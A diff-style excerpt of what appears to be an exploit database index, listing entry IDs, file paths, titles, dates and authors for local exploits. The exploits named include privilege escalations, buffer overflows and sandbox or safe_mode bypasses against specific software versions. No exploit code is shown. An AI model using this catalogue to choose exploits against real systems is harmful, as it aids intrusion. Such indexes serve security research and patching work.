-28287,exploits/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local, -28288,exploits/linux/local/28288.c,"MidiRecord2 MidiRecord.CC - Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local, -28332,exploits/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Privilege Escalation (Metasploit)",2013-09-17,Metasploit,linux,local, -28335,exploits/windows/local/28335.rb,"Agnitum Outpost Internet Security - Local Privilege Escalation (Metasploit)",2013-09-17,Metasploit,windows,local, -28405,exploits/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local, -28425,exploits/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,solaris,local, -28427,exploits/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local, -28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local, -28507,exploits/aix/local/28507.sh,"IBM AIX 6.1/7.1 - Local Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local, -28576,exploits/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local, -40376,exploits/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local, -28655,exploits/multiple/local/28655.rb,"Nodejs - 'js-yaml load()' Code Exec (Metasploit)",2013-09-30,Metasploit,multiple,local, -28657,exploits/linux/local/28657.c,"glibc and eglibc 2.5/2.7/2.13 - Local Buffer Overflow",2013-09-30,"Hector Marco & Ismael Ripoll",linux,local, -40375,exploits/windows/local/40375.txt,"WinSMS 3.43 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local, -28680,exploits/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",linux,local, -28718,exploits/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation",2013-10-04,CurcolHekerLink,freebsd,local, -28763,exploits/windows/local/28763.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (1)",2006-08-26,"Ruben Santamarta",windows,local, -28764,exploits/windows/local/28764.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (2)",2006-08-26,"Ruben Santamarta",windows,local, -28788,exploits/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local, -28789,exploits/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",solaris,local, -29213,exploits/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local, -28806,exploits/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation",2013-10-08,"Lorenzo Cantoni",linux,local, -28817,exploits/multiple/local/28817.txt,"Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local, -28955,exploits/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Local Buffer Overflow (SEH)",2013-10-14,metacom,windows,local, -28969,exploits/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Local Buffer Overflow (SEH)",2013-10-15,metacom,windows,local, -28984,exploits/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local, -40768,exploits/linux/local/40768.sh,"Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local, -29069,exploits/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Local Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local, -29070,exploits/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Local Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local, -29102,exploits/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local, -29125,exploits/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local, -34371,exploits/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Local Buffer Overflow (SEH)",2014-08-20,metacom,windows,local, -29190,exploits/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local, -29194,exploits/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local, -29201,exploits/osx/local/29201.c,"Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local, -29234,exploits/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Local Buffer Overflow (SEH)",2013-10-27,metacom,windows,local, -29239,exploits/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local, -29327,exploits/windows/local/29327.py,"Watermark Master 2.2.23 - Local Buffer Overflow (SEH)",2013-11-01,metacom,windows,local, -29263,exploits/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local, -29309,exploits/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Local Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",windows,local, -29374,exploits/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Local Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local, -29403,exploits/windows/local/29403.txt,"HP (Multiple Products) - PML Driver HPZ12 Privilege Escalation",2007-01-08,Sowhat,windows,local, -29446,exploits/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation",2006-12-18,anonymous,linux,local, -29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",windows,local, -29467,exploits/linux/local/29467.c,"Rixstep Undercover - Local Privilege Escalation",2007-01-15,"Rixstep Pwned",linux,local, -30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,windows,local, -30039,exploits/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",multiple,local, -30017,exploits/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",unix,local, -30021,exploits/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local, -30014,exploits/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local, -29547,exploits/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Local Buffer Overflow (SEH)",2013-11-12,metacom,windows,local, -29528,exploits/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local, -29548,exploits/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Local Buffer Overflow (SEH)",2013-11-12,metacom,windows,local, -29549,exploits/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)",2013-11-12,"Mike Czumak",windows,local, -29594,exploits/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Local Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local, -29603,exploits/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local, -29630,exploits/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local, -30192,exploits/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local, -29695,exploits/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass",2007-03-01,"Matousec Transparent security",windows,local, -29712,exploits/php/local/29712.txt,"Zend Platform 2.2.1 - 'PHP.INI' File Modification",2007-03-03,"Stefan Esser",php,local, -29714,exploits/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local, -29798,exploits/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local, -29746,exploits/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local, -29777,exploits/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Local Buffer Overflow (SEH Unicode)",2013-11-22,"Mike Czumak",windows,local, -30783,exploits/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local, -30154,exploits/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Local Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",windows,local, -30183,exploits/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local, -29799,exploits/windows/local/29799.pl,"Total Video Player 1.3.1 - 'Settings.ini' Local Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local, -29801,exploits/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local, -29804,exploits/php/local/29804.php,"PHP 5.2.1 - Multiple functions 'Reference' Information Disclosures",2007-03-29,"Stefan Esser",php,local, -29822,exploits/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local, -29881,exploits/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil & abh1sek",windows,local, -29922,exploits/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local, -29950,exploits/osx/local/29950.js,"Apple 2.0.4 - Safari Local Cross-Site Scripting",2007-05-04,poplix,osx,local, -29954,exploits/linux/local/29954.txt,"ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local, -30007,exploits/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Overflow",2013-12-03,"Junwen Sun",windows,local, -30096,exploits/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local, -30237,exploits/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local, -30244,exploits/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Bypass",2013-12-12,"Morteza Hashemi",windows,local, -30280,exploits/linux/local/30280.txt,"GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local, -30295,exploits/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local, -30393,exploits/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation (Metasploit)",2013-12-17,Metasploit,win_x86-64,local, -30392,exploits/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)",2013-12-17,Metasploit,windows,local, -30336,exploits/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",windows,local, -30802,exploits/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Local Privilege Escalation",2007-11-24,SoBeIt,windows,local, -30374,exploits/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Local Stack Overflow",2013-12-17,"Arash Allebrahim",windows,local, -30399,exploits/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local, -40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local, -40522,exploits/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local, -30464,exploits/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local, -30468,exploits/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local, -30474,exploits/multiple/local/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local, -30477,exploits/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local, -30484,exploits/bsd/local/30484.txt,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local, -30503,exploits/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,linux,local, -30546,exploits/windows/local/30546.txt,"Microworld eScan (Multiple Products) - Local Privilege Escalation",2007-08-30,"Edi Strosar",windows,local, -30970,exploits/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local, -30604,exploits/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Privilege Escalation",2007-09-21,"Wojciech Purczynski",linux,local, -30605,exploits/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local, -30620,exploits/linux/local/30620.txt,"Xen 3.0.3 - pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",linux,local, -30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String (PoC)",2014-01-03,LiquidWorm,multiple,local, -30680,exploits/windows/local/30680.txt,"Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",windows,local, -30681,exploits/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Local Privilege Escalation",2007-10-18,"Ruben Santamarta",windows,local, -30780,exploits/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local, -30788,exploits/windows/local/30788.rb,"IcoFX - Local Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local, -30789,exploits/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local, -30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local, -30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local, -31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local, -31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local, -31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local, -31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local, -31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,linux,local, -31347,exploits/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local, -31386,exploits/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",windows,local, -31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,windows,local, -31524,exploits/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Local Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local, -31574,exploits/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local, -31576,exploits/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,windows,local, -31643,exploits/windows/local/31643.rb,"Easy CD-DA Recorder - '.pls' Local Buffer Overflow (Metasploit)",2014-02-13,Metasploit,windows,local, -31667,exploits/windows/local/31667.txt,"Microsoft Windows - 'SeImpersonatePrivilege' Local Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local, -31688,exploits/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local, -31766,exploits/windows/local/31766.rb,"Audiotran - '.pls' Local Stack Buffer Overflow (Metasploit)",2014-02-19,Metasploit,windows,local, -31895,exploits/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Local Stack Buffer Overflow",2014-02-25,tishion,windows,local, -40350,exploits/windows/local/40350.py,"Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local, -31911,exploits/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local, -31930,exploits/windows/local/31930.txt,"No-IP DUC Client for Windows - Local Information Disclosure",2008-06-16,"Charalambous Glafkos",windows,local, -31937,exploits/php/local/31937.txt,"PHP 5.2.6 - 'chdir()' Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local, -31940,exploits/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local, -31959,exploits/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local, -40349,exploits/win_x86-64/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local, -31972,exploits/windows/local/31972.py,"Gold MP4 Player 3.3 - Local Buffer Overflow (SEH)",2014-02-28,metacom,windows,local, -31988,exploits/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Local Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local, -31991,exploits/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Local Stack Buffer Overflow",2014-02-28,Provensec,windows,local, -32041,exploits/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local, -32050,exploits/windows/local/32050.py,"Calavera UpLoader 3.5 - Local Buffer Overflow (SEH)",2014-03-04,"Daniel la calavera",windows,local, -32055,exploits/multiple/local/32055.txt,"Netrw Vim Script - 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",multiple,local, -32074,exploits/windows/local/32074.rb,"ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)",2014-03-05,Metasploit,windows,local, -32152,exploits/windows/local/32152.py,"KMPlayer 3.8.0.117 - Local Buffer Overflow",2014-03-10,metacom,windows,local, -32153,exploits/qnx/local/32153.sh,"QNX 6.4.x/6.5.x ifwatchd - Local Privilege Escalation",2014-03-10,cenobyte,qnx,local, -32154,exploits/qnx/local/32154.c,"QNX 6.5.0 x86 io-graphics - Local Privilege Escalation",2014-03-10,cenobyte,qnx,local, -32155,exploits/qnx/local/32155.c,"QNX 6.5.0 x86 phfont - Local Privilege Escalation",2014-03-10,cenobyte,qnx,local, -32156,exploits/qnx/local/32156.txt,"QNX 6.4.x/6.5.x pppoectl - Information Disclosure",2014-03-10,cenobyte,qnx,local, -32158,exploits/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local, -32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,windows,local, -32261,exploits/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local, -32343,exploits/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local, -32358,exploits/windows/local/32358.pl,"MP3Info 0.8.5a - Local Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",windows,local, -32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,hardware,local, -32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local, -32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local, -32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation",2008-11-07,alex,windows,local, -32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local, -32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local, -32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,php,local, -32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local, -32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local, -32751,exploits/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local, -32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local, -32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local, -32778,exploits/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local, -32793,exploits/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)",2014-04-10,Metasploit,windows,local, -32805,exploits/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local, -32820,exploits/linux/local/32820.txt,"OpenSC 0.11.x - PKCS#11 Implementation Unauthorized Access",2009-02-26,"Andreas Jellinghaus",linux,local, -32813,exploits/osx/local/32813.c,"Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Local Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local, -32829,exploits/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass",2009-03-02,"Chris Evans",linux,local, -32845,exploits/windows/local/32845.pl,"IBM System Director Agent 5.20 - CIM Server Privilege Escalation",2009-03-10,"Bernhard Mueller",windows,local, -32847,exploits/multiple/local/32847.txt,"PostgreSQL 8.3.6 - Low Cost Function Information Disclosure",2009-03-10,"Andres Freund",multiple,local, -32848,exploits/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Local Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local, -32850,exploits/windows/local/32850.txt,"SlySoft (Multiple Products) - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local, -32884,exploits/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local, -32891,exploits/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local, -32892,exploits/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local, -32893,exploits/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local, -32901,exploits/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local, -32946,exploits/freebsd/local/32946.c,"FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local, -32947,exploits/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local, -33012,exploits/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local, -33028,exploits/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local, -33069,exploits/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local, -33145,exploits/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local, -33161,exploits/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local, -33213,exploits/win_x86/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,win_x86,local, -33229,exploits/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local, -33255,exploits/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local, -33321,exploits/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local, -33322,exploits/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)",2009-11-03,"teach & xipe",linux,local, -33593,exploits/windows/local/33593.c,"Microsoft Windows XP/Vista/2000/2003 - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local, -33336,exploits/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)",2013-02-24,SynQ,linux,local, -33360,exploits/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local, -33387,exploits/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local, -33395,exploits/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local, -40823,exploits/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local, -33508,exploits/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local, -33516,exploits/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local, 